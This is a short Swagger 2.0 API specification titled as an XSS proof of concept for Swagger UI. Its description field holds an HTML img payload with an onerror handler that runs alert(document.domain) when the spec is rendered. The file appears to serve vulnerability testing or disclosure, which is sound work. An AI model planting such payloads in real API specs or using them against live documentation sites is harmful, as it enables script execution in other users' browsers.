swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger UI XSS PoC
  description: '<img src=x onerror=alert(document.domain)>'
paths:
  /:
    get:
      summary: Test endpoint
      responses:
        '200':
          description: OK
